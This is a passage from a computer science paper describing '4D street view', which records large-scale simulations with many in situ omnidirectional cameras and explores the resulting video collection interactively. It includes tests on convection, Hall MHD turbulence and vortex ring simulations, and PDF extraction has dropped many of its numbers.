discrete subset of continuous function of pixel data defined in a five-dimensional space; the camera position in d and the viewing direction in d. adelson & bergen ( ) call the five-dimensional function “plenoptic function”, from plenus (complete)-optic. in short, our method connotes sightseeing in d. specifying a path in spacetime (see fig. ), we extract a sequence of images along the path. the images are presented figure video data collections and a path in d spacetime. since the videos in the data collection are tied with their camera position, we can identify the data collection as a field of omnidirectional still images distributed in d (x, y, z and t) space. the user specifies a path in spacetime, and an application program extracts a sequence of images on the path and shows them on the pc window as a smooth video. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the pc window as a smooth video. if we notice an intriguing dynamics of the simulation in the video, we can fly to the location (i.e., we read the video file whose camera is close to the location) and observe the phenomenon. note that we can also go back in time (or play the video backward in time) to identify the cause of the dynamics. 
we call this visualization method “four dimensional ( d) street view” because it is reminiscent of google street view (anguelov et al., ). another ancestor of d street view is quicktime vr (chen, ) that realized the interactive navigation of multiple files of panoramic pictures. the idea of interactive retrieval of image sequences from multiple video files can be traced back to “movie-maps” by lippman ( ), in which the user interactively switch video segments at preregistered points. the actual procedure of the d street view is separated into three stages, namely, the recording, conversion, and browsing. in the recording stage, we apply in situ visualizations on a supercomputer system with many omnidirectional cameras. in the conversion stage, we convert the output image dataset into a video data collection, which is the input of the browsing stage. in the browsing stage, we specify the camera path in d interactively and view the video on a pc window by a dedicated application program called d street viewer. recording stage of d street view the recording stage of the d street view should have the following three items, namely, multiple points of view, omnidirectional rendering, and in situ visualization. multi-point visualization the multi-point visualization is theoretically the most straightforward part among the three items because it is generally possible to set plural viewpoints in an in situ visualization tool. in the d street view, the configuration of the omnidirectional cameras is arbitrary. herein, we place them in rectilinear distributions, that is, uniformly distributed in the x, y and z directions with the same spacings between the cameras in each direction. we denote the number of cameras in each direction as cx, cy and cz. the total number of cameras is cx × cy × cz. figure shows two types of distribution of omnidirectional cameras (green spheres) that are used in test simulations described later. in (a) and (b), the camera configuration is (cx, cy, cz) = ( , , ), and in (c) and (d), it is (cx, cy, cz) = ( , , ). the rectangular boxes in the figure denote the boundary of the simulations. omnidirectional visualization to apply omnidirectional visualization from each camera, we follow the standard procedure of the cube mapping (greene, ; sellers, wright & haemel, ). we assume a virtual sphere and a cube around the point; see fig. a. projecting the edges of the cube onto the sphere from the center, we have twelve arcs of great circles. the arcs divide the sphere or the p solid angle into six parts, that is, front, back, right, left, top, and bottom. we perform visualizations with the regular perspective projection six times for the six areas. as a result, we obtain six pictures and save them in the portable kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network graphics (png) format using libpng library during the simulation. note that png is a graphics format with lossless compression. the pixel size of the six perspective projections used herein is × . an example of the six images is shown in fig. b. the six png files are combined to a single file as an omnidirectional image after the simulation in the conversion stage to be described later. we can, of course, directly apply the conversion to the omnidirectional images during the simulation. implementing such functions is one of the future topics of this research. 
it would also be possible to use a visualization tool with direct rendering with the omnidirectional projection. in situ visualization we can choose any in situ visualization strategy for the recording stage. here, we take the synchronous approach wherein the visualization functions are called and controlled by the simulation program. the same approach is taken, for example, by yu et al. ( ). in this synchronous in situ visualization method, the simulation and visualization programs share the computer nodes. the computation for the simulation is suspended figure two samples of the omnidirectional camera configuration (green spheres). (a & b) -d configuration of , cameras (viewed from different angles) used in the test simulation of the vortex- ring. (c & d) -d configuration of cameras for the test simulation of hall mhd turbulence. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while the visualization is running. there is another approach to in situ visualization, referred to as the asynchronous in situ visualization, as in dreher & raffin ( ). in this case, the visualization program runs independent of the simulation program. we will comment on this asynchronous in situ visualization in conclusions. as a renderer, we use vismo (ohno & ohtani, ) in this study. vismo is an in situ visualization library written in fortran. it supports fundamental visualization methods, including the isosurface, slice plane, arrow glyphs, streamlines, and volume rendering. an essential feature of vismo is that all the visualization methods are implemented based on the ray casting algorithm (levoy & marc, ). therefore, vismo can perform the in situ visualization on supercomputer systems with no gpu. vismo is a self-contained library that requires no other basic tools or libraries except for libpng and a fortran compiler. we can get visualization images with a simulation program by just calling vismo’s functions. this is a great merit for simulation researchers. in our experiences, one of the general practical burdens in the situ visualization is the preparation of a necessary environment for a supercomputer system, for example, to install osmesa that is a basic off-screen rendering library for opengl. srend (wetherbee et al., ) is a similar library as vismo; it performs the in situ visualization of the volume rendering by the ray casting. data conversion to mp as described above, every in situ visualization from a fixed point of view produces a set of six png images. after the simulation, we combine the six files into a single image, according to the following procedure. firstly, we assume that the six images are projected onto the sphere (see fig. a). the spherical image is then mapped to a single rectangular image by the equirectangular projection. the pixel size for the omnidirectional image in this work is , × , . figure the omnidirectional visualization method in this study. (a) we divide the solid angle p around a point of view into six parts by projecting the edges of a cube onto a sphere. the centers of the cube and sphere are on the point. we then apply the standard perspective projections for each part for six times. (b) example of the six images obtained by the in situ visualization in a test simulation. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
a set of omnidirectional image files from a certain camera position is then converted to a video file with the mp4 codec (puri, chen & luthra, ), which applies a lossy but quality-preserving compression to reduce the size. we use ffmpeg for this conversion.

test simulations

to test 4d street view, we apply this method to three different kinds of simulations.

thermal convection in a spherical shell

the first test simulation is thermal convection in a spherical shell vessel (see fig. ). a fluid is confined between two concentric spheres of radii ro and ri. inward central gravity (gravity acceleration g) and a fixed temperature difference Δt between the spheres drive the thermal convection motion. convection in spherical shells has been studied extensively in geophysics and astrophysics. the test simulation in this article is characterized by the lack of rotation of the spheres and the relatively shallow depth of the shell compared to standard geophysical and astrophysical simulations. it is known that thermal convection in a spherical shell with a relatively small gap, ro − ri, exhibits very different patterns, such as spiral rolls (zhang, liao & zhang, ; itano et al., ), from those in a deep shell.

we solve the navier–stokes equation with the finite difference method on the yin-yang grid (kageyama & sato, ). we denote the spherical shell region in the spherical coordinate system (r, ϑ, φ) as ri ≤ r ≤ ro, 0 ≤ ϑ ≤ π, −π ≤ φ < π. the grid sizes of each yin- or yang-component grid are nr in the radial span, nϑ in the latitudinal span (π/4 ≤ ϑ ≤ 3π/4), and nφ in the longitudinal span (−3π/4 ≤ φ ≤ 3π/4). the total grid size is nr × nϑ × nφ × 2, where the last factor accounts for the yin and yang components. a fourth-order explicit runge-kutta method is used for the time integration. the rayleigh number ra, a non-dimensional parameter that characterizes the drive of the convection, is set to a supercritical value so that convection sets in.

the initial condition of the simulation is a force-balanced, convectively unstable state, that is, ∇p0 = ρ0 g, where ρ0 and p0 are the mass density and pressure at time t = 0. the initial flow is zero: v = 0 at t = 0. we add a perturbation δp to the initial pressure field, p = p0 + δp(r, ϑ, φ), to start the convection. in this experiment, we set a single mode of the spherical harmonics, δp(r, ϑ, φ) = a(r) Ỹ_ℓ^m(ϑ, φ), where Ỹ_ℓ^m is the (normalized) spherical harmonic satisfying ∫ Ỹ_ℓ^m Ỹ_ℓ′^m′ ds = δ_ℓℓ′ δ_mm′. the radial function is given by a(r) = c sin(π(r − ri)/(ro − ri)) with a small constant amplitude c. we set ℓ = m in this test simulation, which means that the perturbation δp is highly localized in the (co)latitudinal direction ϑ near the equator ϑ = π/2, while it has a sinusoidal mode m in the longitudinal direction φ.

figure: the simulation model of the spherical shell convection and the coordinate system.

for 4d street view, we place c = cx × cy × cz omnidirectional cameras on the equatorial plane ϑ = π/2. we record the time development of the spherical shell convection with a constant interval of non-dimensional time τ (one frame every fixed number of simulation time steps). figure shows the time development of the convection visualized by isosurfaces of the normalized radial velocity vr.
hall mhd turbulence

the second simulation for the test of 4d street view is magnetohydrodynamic (mhd) turbulence with the hall term. we incorporate in situ, multi-point, omnidirectional visualization cameras into a hall mhd turbulence simulation code (miura & hori, ; miura, araki & hamba, ; miura, ). in the simulation, the time development of the hall mhd equations is solved by the fourier pseudo-spectral method. the simulation geometry is a cube with periodic boundary conditions in all (x, y and z) directions, with an equal number of grid points in each direction. the 2/3-truncation technique is used for de-aliasing. the runge–kutta–gill method is adopted for the temporal integration. as the initial condition, large-scale velocity and magnetic fields are specified with random phases. just after the simulation starts, the fluid goes through instabilities, and the velocity and magnetic energies are transferred toward smaller and smaller scales until the flow reaches a fully developed turbulence. this highly complicated dynamics is a good test bench for the true value of 4d street view in the interactive analysis of in situ visualization.

figure: thermal convection in the spherical shell visualized by isosurfaces of normalized radial velocity vr; the banana-like purple objects indicate the downward flow in the convection. (a)–(d) are convection patterns at four successive times, viewed from a point on the equatorial plane ϑ = π/2; (e)–(h) are omnidirectional images at the same instants, taken by the omnidirectional camera placed at the spherical origin r = 0.

in this simulation, we try a one-dimensional configuration of the omnidirectional cameras, with all viewpoints on the x axis at a constant spacing, as shown in figs. c and d. as shown in fig. , we apply the in situ visualizations to the isosurfaces of the electric current density (colored in green-to-red) and the enstrophy density (gray-to-white).

figure: the hall mhd simulations used as a test of 4d street view. we apply three in situ visualizations (isosurfaces of two different fields and the superposition of the two visualization methods). the upper three panels are for the initial condition; time advances toward the middle and lower panels.

vortex ring formation

the third test is a simulation of vortex ring (or smoke ring) formation, which is a well-known phenomenon; see, for example, shariff & leonard ( ) and lim & nickels ( ) for reviews. we assume a quiet gas in a rectangular box and apply an impulsive force in a localized region when the simulation starts. the fluid in the forced region is driven in the direction of the force. although the initial flow exhibits complicated structures, the flow soon settles into a localized vortex in a simple torus shape, which is called a vortex ring. the vortex ring propagates at a uniform speed while maintaining its shape. the simulation model is as follows: we solve the navier–stokes equation for a compressible fluid in the cartesian coordinate system (x, y, z). the simulation region is a rectangular box with normalized side lengths lx × ly × lz; see fig. .
the periodic boundary condition is assumed in all directions of x, y and z. the origin of the coordinate system is at the center of the simulation region. in the initial condition, the fluid has no flow, with uniform temperature and density. we apply a pulse of force f to drive the fluid when the simulation starts at t = 0. the navier–stokes equation is discretized by a second-order central finite difference method, and a fourth-order explicit runge-kutta method is used for the time integration. for this simulation, we have tried three different rectilinear configurations of the omnidirectional cameras (cx, cy, cz), with three visualization methods: (1) isosurfaces of the enstrophy density e = |∇ × v|², where v is the flow velocity; (2) arrow glyphs of v; (3) stream lines of v.

figure: simulation model of the vortex ring. (a) shows the simulation model: a rectangular region filled with a compressible fluid, with normalized side lengths lx, ly and lz in the x, y and z directions, respectively. the origin of the coordinate system is at the center of the region. a pulse force in the +x direction is applied in a cylindrical region near the end boundary of the box; the force drives the fluid in the cylinder, and the flow soon settles into a ring-shaped vortex. (b–d) show the vortex ring propagating in the +x direction.

we performed several experiments with different parameters for the physics and the visualization. in most cases, the driving force vector f has only an x component, but in one experiment we also apply perpendicular (y and z) components in such a way that the driven flow has a twisting component. this leads to an intriguing formation of a vortex ring with flow helicity.

4d street viewer

the omnidirectional video files are tied to their camera positions by means of their file names; for example, a file name of the form sample.cx_cy_cz.mp4 identifies the video recorded by the omnidirectional camera located at the grid position (cx, cy, cz) in the rectilinear configuration. the video files named according to this convention constitute the input data collection of the 4d street viewer. the user specifies a camera position (cx, cy, cz) and changes it in real time through the 4d street viewer. some keys on the keyboard are allocated to increment or decrement cx, cy and cz. additionally, the user can specify the next camera to move to by mouse clicks: a mouse click specifies a direction in which one wants to move in the simulation space presented in the window, and the 4d street viewer picks the neighboring camera (cx ± 1, cy ± 1, cz ± 1) that is closest to the line defined by that direction (a sketch of this selection logic is given below). each time the user specifies a new camera position or switches to a new visualization method, the 4d street viewer retrieves the corresponding file from the data collection. it imports one file at a time directly from the data collection, without buffering or prefetching. since the frame number in the video is consistently passed over to the next video, the user can smoothly change the video file while playing a video. figure shows a snapshot of the window of the 4d street viewer with its user interface. one can resize the window by dragging a corner of the window with the mouse.
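a minimal sketch of the camera bookkeeping just described, i.e., the file-name convention and the choice of the neighboring camera closest to a clicked direction, could look as follows (python, hypothetical names; the real viewer is a c++ application built on kvs, and "closest to the line" is interpreted here as the largest cosine similarity with the clicked direction).

```python
import math

def video_path(prefix, i, j, k):
    # hypothetical file-name scheme tying each video to its camera grid indices
    return f"{prefix}.{i}_{j}_{k}.mp4"

def neighbor_toward(current, click_dir, camera_pos, grid_shape):
    """pick the neighboring camera (each grid index changed by at most one) whose
    direction from the current camera best matches the clicked direction.
    current: (i, j, k) grid indices; click_dir: unit 3-vector in simulation space;
    camera_pos: function mapping grid indices to a position in simulation space."""
    best, best_cos = current, -2.0
    cur = camera_pos(*current)
    for di in (-1, 0, 1):
        for dj in (-1, 0, 1):
            for dk in (-1, 0, 1):
                if di == dj == dk == 0:
                    continue
                cand = (current[0] + di, current[1] + dj, current[2] + dk)
                if not all(0 <= c < n for c, n in zip(cand, grid_shape)):
                    continue                       # stay inside the camera grid
                p = camera_pos(*cand)
                v = [p[a] - cur[a] for a in range(3)]
                norm = math.sqrt(sum(x * x for x in v))
                cos = sum(v[a] * click_dir[a] for a in range(3)) / norm
                if cos > best_cos:                 # best alignment with the click
                    best, best_cos = cand, cos
    return best
```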
shown in the left panel is the view of the simulation from the current camera position and direction. in the right panel of the window, text fields present the input video and the current status. the playing mode of the video (play/stop/reverse), as well as the current frame, is controlled by the buttons and slider bars in the right panel. we have developed the 4d street viewer in the framework of kvs (sakamoto & koyamada, ). kvs is a visualization development framework provided as a c++ class library. although the primary purpose of kvs is to provide a modular programming environment for scientific and information visualization, it can also be used as a more general framework for the development of an application such as the 4d street viewer.

figure: a snapshot of the window of the 4d street viewer. the left panel shows the current view extracted from an omnidirectional image in the input video. the camera configuration (cx, cy, cz), the current camera position, the current frame number, and other information about the video data collection are shown in the right panel.

interactive analysis of the test simulations with 4d street view

viewpoint translation

we first present an interactive translation of the viewpoint by the 4d street viewer, applied to the hall mhd simulation. figure is a sequence of six snapshots from a recorded video in the supplemental data (https://github.com/vizlab-kobe/4dsvtestdata/tree/master/movies). since the number of omnidirectional cameras along the x axis is sufficiently high, the user has a smooth walk-through experience when changing the viewpoint by means of the slide bar, mouse clicks, or keyboard input. although the six images (a)–(f) show the same frame in this figure, the video in the supplemental data presents the interactive translation also in time, in the simulation's space-time. note that the smooth walk-through experience provided by the viewpoint translation of 4d street view is not degraded even when the visualized scene is much more complicated, after the turbulence is fully developed (see the later part of the supplemental video). on the other hand, if we applied post-hoc visualization to the fully developed turbulence, such as the bottom three panels in fig. , the response would be slowed down because there are myriads of polygons.

figure: translation of the viewpoint in the hall mhd simulation. (a–f) show an image sequence in the walk-through in the simulation region.

looking around

as in standard visualization applications, a mouse drag is allocated to the rotation of the view in the 4d street viewer. in our case, a rotation means resampling the field of view around the specified direction from the omnidirectional image, as in regular video-playing programs for panoramic videos. we perform the resampling on a gpu. in standard post-hoc visualization programs, a rotation specified by a user invokes a rotational transformation of the scene in the computer graphics, and getting a new image after a rotation may be time-consuming if the rotated scene requires massive rendering. as in the case of the viewpoint translation, in 4d street view a rotated image always appears momentarily, regardless of the complexity of the scene, since the views from all angles are already stored in the omnidirectional video.

figure is a snapshot sequence taken from a video in the supplemental data (https://github.com/vizlab-kobe/4dsvtestdata/tree/master/movies). this figure demonstrates the change of the viewing direction by the 4d street viewer for the spherical shell convection simulation. in the left three panels, the viewpoint is located at a point on the equator just inside the inner sphere r = ri. the purple bar-like objects are isosurfaces of negative radial velocity vr; they denote the downward flow of the convection cells (or convection rolls). the time frame is fixed in the left three panels. in the right three panels, we move to the viewpoint located at the origin r = 0. we then play the video forward in time for a while to observe that the bar-like convection rolls grow toward the north and south poles, applying the mouse drag again to observe the ring-like patterns near the north pole. the bar-like structure of the convection rolls cannot be maintained in the high-latitude regions because the distances between neighboring rolls (in the longitudinal direction) decrease as the tips of the rolls approach the poles. instead of the longitudinal rolls of the low-latitude regions, a ring-like pattern appears in the polar regions, which is observed by the isosurface of positive vr (upward flow) in the right three panels.

change of visualization method

we have already changed the visualization method in the 4d street viewer between the left and right panels of the figure just described. figure shows another example of the interactive switching of the applied visualization methods; this figure is an image sequence taken from a video in the supplemental data (https://github.com/vizlab-kobe/4dsvtestdata/tree/master/movies). in this case, the simulation of the vortex ring with the twisting force is visualized by (i) an isosurface of the enstrophy density e and (ii) the isosurface of e plus stream lines of the flow velocity v. in this visualization, we change the time frame, viewpoint position, viewing direction, and visualization method (with and without the stream lines).

discussion

the mp4 conversion by ffmpeg from the png images is the only stage wherein lossy compression is applied in our procedure. (the mapping from the six directional images to an omnidirectional image described above incorporates pixel interpolations, but the image deterioration caused by the interpolation is negligibly small.)

figure: change of viewing direction of the spherical shell convection in the 4d street viewer by the mouse drag motion.
to confirm the impact of the lossy compression by mp4, we compare, in fig. , an omnidirectional png image and an image extracted from the mp4 video by the 4d street viewer at the same frame. the degradation of the image quality by the mp4 conversion is negligibly small for visualization analysis.

figure: the vortex ring simulation with the twisting force. two visualization methods (with and without the stream lines) are switched while playing the video. (a) shows an isosurface visualization without the stream lines. (b–e) show the same time frame with different view positions and directions. (e) and (f) are from the same frame later in the time development.

figure: comparison of images before (a) and after (b) the lossy compression by the mp4 codec. (a) the original omnidirectional png image. (b) snapshot from the mp4 video file at the same frame.

in this work, the largest number of omnidirectional cameras scattered in a test simulation was about one thousand, for the vortex ring simulation. we applied two visualizations from each camera, and the total size of the resulting video files compressed in the mp4 codec remained modest. this result shows that the data size of the video data collection in 4d street view with a thousand cameras can be regarded as small by today's norms for storage capacity. the small size of the video data collection is due to the compression by the mp4 codec.

for the hall mhd simulation, the run was performed with a modest spatial resolution, and the in situ visualization was applied for a limited number of time frames. the total storage size needed to save the three kinds of omnidirectional mp4 video files (electric current, enstrophy density, and their superposition) is correspondingly small. on the other hand, if we were to perform post-hoc visualization, we would have to save the raw numerical data of at least four fields (the three components of the velocity vector plus one scalar) in double precision (8 b per value). the storage size then amounts to (grid size)³ × (number of fields) × (number of time steps) × 8 b. even in this small-scale simulation, the storage size for the 4d street view method is smaller than that for post-hoc visualization. moreover, this spatial resolution is low by the current standard of high-performance computing; it is not rare these days to perform turbulence simulations with thousands of grid points in each direction. saving the raw numerical data for post-hoc visualization at such a spatial resolution (and with the corresponding temporal resolution) is certainly impractical, whereas the storage size for 4d street view is only weakly dependent on the spatial resolution of the simulation.
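the scaling argument above can be made concrete with a back-of-the-envelope calculation; all numbers in the following sketch are hypothetical placeholders (the actual figures of this work are not reproduced here), chosen only to show that the post-hoc data volume grows with the cube of the grid size while the video collection does not.

```python
def posthoc_bytes(n, fields=4, steps=100, word=8):
    """raw double-precision data for post-hoc visualization: grows like n**3."""
    return n**3 * fields * steps * word

def street_view_bytes(cameras=1000, videos_per_camera=3, mb_per_video=20):
    """omnidirectional video collection: independent of the simulation grid size."""
    return cameras * videos_per_camera * mb_per_video * 1024**2

for n in (256, 1024, 4096):
    print(f"n = {n:5d}: post-hoc ~ {posthoc_bytes(n):.2e} B, "
          f"4d street view ~ {street_view_bytes():.2e} B")
```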
in this work, we have placed the omnidirectional cameras in rectilinear configurations of one, two, or three dimensions. however, the camera density does not need to be uniform in 4d street view: we can reduce the total number of cameras by distributing them in a nonuniform way, concentrating them only near regions of interest. the video collection explored in 4d street view is a set of discrete samples of the continuous plenoptic function (adelson & bergen, ) in 4d space. it would be possible to apply image-based rendering techniques from computer graphics, such as "view interpolation" (chen & williams, ) or "plenoptic modeling" (mcmillan & bishop, ), to obtain visualized images viewed from intermediate positions between the specified viewpoints.

generally, in situ visualization is a way to use supercomputer resources to reduce the burden on simulation researchers, who nowadays spend much of their research time on post-hoc visualization chores such as data transfer and preparation before the visualization itself can start. the situation will become worse in the future with the further development of supercomputer technology. even today, the computing power of a single supercomputer system is excessive for a single simulation job. it would therefore be a valid idea to use a supercomputer system primarily for the visualization and secondarily for the simulation.

conclusions

we have proposed a new visualization method, referred to as "4d street view", for large-scale simulations. the key idea is to record a simulation with many omnidirectional cameras scattered in the simulation space. the cameras record the simulation through in situ visualization. as a result of the simulation, we obtain a data collection of omnidirectional videos, in which each video is tied to its camera position. the video data collection can be regarded as a field of omnidirectional still images in 4d spacetime. we have developed a dedicated application program (the 4d street viewer) to explore the video data collection. with the program, we interactively specify a path in 4d spacetime, extract a sequence of images along the path, and show them as a smooth video on the screen. if we find an intriguing phenomenon that is far away from the current camera, we can "fly" there with the 4d street viewer and scrutinize it from nearby cameras. it is also possible to go backward in time to investigate the cause of the phenomenon. we can change the view angle at any time, since all views are stored in the omnidirectional images. we can also switch the applied visualization methods, as long as the corresponding videos have been recorded in the simulation.

one of the challenges of 4d street view is the time spent on the visualization. we have applied synchronous in situ visualization in this work; the same computer nodes are allocated for the simulation and the visualization, and the parallelization of the simulation determines the number of nodes. when we perform a visualization-intensive computation, we should allocate many more nodes to the in situ visualization than to the simulation. we are developing another approach, asynchronous in situ visualization, for the recording stage of 4d street view (kageyama, sakamoto & yamamoto, ). the simulation program and the visualization program run independently on different computer nodes with no explicit synchronization; they have their own main programs and their own mpi_init and mpi_finalize calls. to realize this multiple program, multiple data (mpmd) framework, we place a layer called the membrane between the simulation and the visualization. with this membrane method, we can allocate any number of computer nodes to the in situ visualization in visualization-intensive cases.

acknowledgements

we would like to thank prof.
chandrajit bajaj for suggesting the use of omnidirectional cameras to improve our mutil-point in situ visualization method. we thank ms. keiko otsuji for her skilled technical assistance. we are grateful to prof. nobuaki ohno for providing us with the vismo’s source code. we are also grateful to prof. hedeaki miura for providing us with the hall mhd simulation code. additional information and declarations funding this work was supported by grant-in-aid for scientific research (kakenhi) k and h , scat (support center for advanced telecommunications technology research) foundation, i-o data foundation, and tateishi science and technology kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ foundation. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: grant-in-aid for scientific research (kakenhi): k and h . support center for advanced telecommunications technology research (scat) foundation. i-o data foundation. tateishi science and technology foundation. competing interests the authors declare that they have no competing interests. author contributions � akira kageyama conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � naohisa sakamoto analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: source code is available at github: https://github.com/vizlab-kobe/ dstreetviewmovieviewer. data are available at github: https://github.com/vizlab-kobe/ dsvtestdata. sample movies are available at github: https://github.com/vizlab-kobe/ dsvtestdata/tree/master/movies. references adelson eh, bergen jr. . the plenoptic function and the elements of early vision. in: landy m, movshon ja, eds. computational models of visual processing. cambridge: the mit press, – . ahrens j, jourdain s, o’leary p, patchett j, rogers dh, petersen m. . an image-based approach to extreme scale in situ visualization and analysis. in: sc ’ : proceedings of the international conference for high performance computing, networking, storage and analysis. – . anguelov d, dulong c, filip d, frueh c, lafon s, lyon r, ogale a, vincent l, weaver j. . google street view: capturing the world at street level. computer ( ): – doi . /mc. . . ayachit u, bauer a, geveci b, o’leary p, moreland k, fabian n, mauldin j. . paraview catalyst. in: proceedings of the first workshop on in situ infrastructures for enabling extreme-scale analysis and visualization—isav . new york: acm press, – . kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/vizlab-kobe/ dstreetviewmovieviewer https://github.com/vizlab-kobe/ dsvtestdata https://github.com/vizlab-kobe/ dsvtestdata/tree/master/movies http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ayachit u, whitlock b, wolf m, loring b, geveci b, lonie d, bethel ew. . the sensei generic in situ interface. in: proceedings of isav : workshop on in situ infrastructures for enabling extreme-scale analysis and visualization - held in conjunction with sc . – . 
banesh d, schoonover ja, ahrens jp, hamann b. . extracting, visualizing and tracking mesoscale ocean eddies in two-dimensional image sequences using contours and moments. in: rink k, middel a, zeckzer d, bujack r, eds. workshop on visualisation in environmental sciences. darmstadt: the eurographics association, – . berres as, turton tl, petersen m, rogers dh, ahrens jp. . video compression for ocean simulation image databases. darmstadt: the eurographics association. chen se. . quicktime vr—an image-based approach to virtual environment navigation. in: proceedings of the acm siggraph conference on computer graphics. new york: acm, – . chen se, williams l. . view interpolation for image synthesis. in: th annual conference on computer graphics and interactive techniques, siggraph , new york, association for computing machinery, inc. new york: acm, – . childs h, ma k-l, yu h, whitlock b, meredith j, favre j, klasky s, podhorszki n. . in situ processing. in: betherl ew, childs h, hansen c, eds. high performance visualization: enabling extreme scale scientific insight, chapter . london: chapman and hall, – . dreher m, raffin b. . a flexible framework for asynchronous in situ and in transit analytics for scientific simulations. in: th ieee/acm international symposium on cluster, cloud, and grid computing. piscataway: ieee, – . greene n. . environment mapping and other applications of world projections. ieee computer graphics and applications ( ): – . itano t, ninomiya t, konno k, sugihara-seki m. . spiral roll state in heat convection between nonrotating concentric double spherical boundaries. journal of the physical society of japan ( ): doi . /jpsj. . . kageyama a, sakamoto n, yamamoto k. . membrane layer method to separate simulation and visualization. in: th international conference on simulation and modeling methodologies, technologies and applications. – . kageyama a, sato t. . “yin-yang grid”: an overset grid in spherical geometry. geochemistry, geophysics, geosystems :q . kageyama a, yamada t. . an approach to exascale visualization: interactive viewing of in- situ visualization. computer physics communications ( ): – doi . /j.cpc. . . . kawamura t, noda t, idomura y. . in-situ visual exploration of multivariate volume data based on particle based volume rendering. in: nd workshop on in situ infrastructures for enabling extreme-scale analysis and visualization. – . kress j, pugmire d, klasky s, childs h. . visualization and analysis requirements for in situ processing for a large-scale fusion simulation code. in: proceedings of the nd workshop on in situ infrastructures for enabling extreme-scale analysis and visualization. – . levoy m, hanrahan p. . light field rendering. in: proceedings of the rd annual conference on computer graphics and interactive techniques, siggraph . – . levoy m, marc. . efficient ray tracing of volume data. acm transactions on graphics ( ): – doi . / . . lim tt, nickels tb. . vortex rings. in: fluid vortices. dordrecht: kluwer academic publishers, – . kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jpsj. . http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lippman a. . movie-maps: an application of the optical videodisc to computer graphics. comput graphics ( ): – doi . / . . lofstead j, klasky s, schwan k, podhorszki n, jin c. . flexible io and integration for scientific codes through the adaptable io system (adios). 
in: proceedings of the th international workshop on challenges of large applications in distributed environments. – . ma k-l. . in situ visualization at extreme scale: challenges and opportunities. in: ieee computer graphics and applications. piscataway: ieee, – . ma kl, wang c, yu h, tikhonova a. . in-situ processing and visualization for ultrascale simulations. journal of physics: conference series ( ): – . matthes a, huebl a, widera r, grottel s, gumhold s, bussmann m. . in situ, steerable, hardware-independent and data-structure agnostic visualization with isaac. supercomputing frontiers and innovations ( ): – . mcmillan l, bishop g. . plenoptic modeling: an image-based rendering system. in: proceedings of the acm siggraph conference on computer graphics, vol. . – . miller g, hoffert e, chen se, patterson e, blackketter d, rubin s, applin sa, yim d, hanan j. . the virtual museum: interactive d navigation of a multimedia database. journal of visualization and computer animation ( ): – doi . /vis. . miura h. . extended magnetohydrodynamic simulations of decaying, homogeneous, approximately-isotropic and incompressible turbulence. fluids ( ): doi . /fluids . miura h, araki k, hamba f. . hall effects and sub-grid-scale modeling in magnetohydrodynamic turbulence simulations. journal of computational physics : – doi . /j.jcp. . . . miura h, hori d. . hall effects on local structures in decaying mhd turbulence. journal of plasma fusion research : – . ohno n, ohtani h. . development of in-situ visualization tool for pic simulation. plasma and fusion research : doi . /pfr. . . o’leary p, ahrens j, jourdain s, wittenburg s, rogers dh, petersen m. . cinema image-based in situ analysis and visualization of mpas-ocean simulations. parallel computing : – doi . /j.parco. . . . puri a, chen x, luthra a. . video coding using the h. /mpeg- avc compression standard. signal processing: image communication ( ): – doi . /j.image. . . . ross rb, peterka t, shen hw, hong y, ma kl, yu h, moreland k. . visualization and parallel i/o at extreme scale. journal of physics: conference series : doi . / - / / / . sakamoto n, koyamada k. . kvs: a simple and effective framework for scientific visualization. journal of advanced simulation in science and engineering ( ): – doi . /jasse. . . sakamoto n, nonaka j, koyamada k, tanaka s. . particle-based volume rendering. in: th international asia-pacific symposium on visualization. piscataway: ieee, – . schroeder w, martin k, lorensen b. . the visualization toolkit: an object-oriented approach to -d graphics. fourth edition. new york: kitware. sellers g, wright rs, haemel n. . opengl superbible: comprehensive tutorial and reference. seventh edition. boston: addison-wesley. kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /vis. http://dx.doi.org/ . /fluids http://dx.doi.org/ . /j.jcp. . . http://dx.doi.org/ . /pfr. . http://dx.doi.org/ . /j.parco. . . http://dx.doi.org/ . /j.image. . . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /jasse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shariff k, leonard a. . vortex rings. annual review of fluid mechanics ( ): – doi . /annurev.fl. . . . shum h, kang sb. . review of image-based rendering techniques. visual communications and image processing : . tikhonova a, correa cd, ma k-l. a. explorable images for visualizing volume data. in: proceedings of ieee pacific visualization symposium , pacificvis . – . tikhonova a, correa cd, ma kl. b. 
